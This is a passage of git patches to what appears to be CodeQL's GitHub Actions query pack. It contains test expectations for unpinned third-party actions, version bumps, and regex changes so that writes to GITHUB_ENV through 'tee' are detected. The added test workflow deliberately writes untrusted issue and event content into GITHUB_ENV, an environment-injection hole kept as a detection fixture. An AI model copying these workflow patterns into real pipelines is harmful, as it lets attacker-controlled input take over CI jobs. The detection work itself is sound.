pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From c9b7340718863d318202253286f5c5bb71edb2ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:38:46 +0200 Subject: [PATCH 442/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 93f6688d2b41..856fbaebb193 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.27 +version: 0.1.28 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6ceb57f09461..73dff5a1dc8c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.27 +version: 0.1.28 groups: [actions, queries] suites: codeql-suites extractor: javascript From def170425af2e3553523964640572a6f4a3e2083 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:43:48 +0200 Subject: [PATCH 443/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 856fbaebb193..dff01f80f2b5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.28 +version: 0.1.29 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 73dff5a1dc8c..1070a8e9a977 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.28 +version: 0.1.29 groups: [actions, queries] suites: codeql-suites extractor: javascript From f457537b34e36559e621081691375a14cad0db49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 17:47:23 +0200 Subject: [PATCH 444/707] feat(bash): Add support for tee as a way to write to GITHUB special files --- ql/lib/codeql/actions/Helper.qll | 22 +- .../.github/workflows/multiline2.yml | 89 ++++++ .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.expected | 265 +++++++++++++++++- 4 files changed, 366 insertions(+), 12 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline2.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index cd964a6621d7..f177c645dbdc 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -74,9 +74,10 @@ predicate extractVariableAndValue(string raw_content, string key, string value) bindingset[script] predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" and content = script.regexpCapture(regexp, 2) ) @@ -100,18 +101,19 @@ predicate singleLineWorkflowCmd(string script, string cmd, string key, string va bindingset[script] predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 3)) and - content = script.regexpCapture(regexp, 5) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and filters = "" or regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 6)) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 7) + content = script.regexpCapture(regexp, 8) ) } @@ -142,13 +144,13 @@ predicate blockFileWrite(string script, string cmd, string file, string content, // "(.*?)" + // - "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and content = script .regexpCapture(regexp, 1) .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and cmd = "echo" and filters = "" ) diff --git a/ql/test/library-tests/.github/workflows/multiline2.yml b/ql/test/library-tests/.github/workflows/multiline2.yml new file mode 100644 index 000000000000..1941dd8f22ab --- /dev/null +++ b/ql/test/library-tests/.github/workflows/multiline2.yml @@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog< event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat | tee -a $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL | tee -a $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF | tee -a "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') | tee -a $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | @@ -149,6 +183,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | @@ -173,6 +208,31 @@ runStepChildren | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | @@ -278,6 +338,108 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | 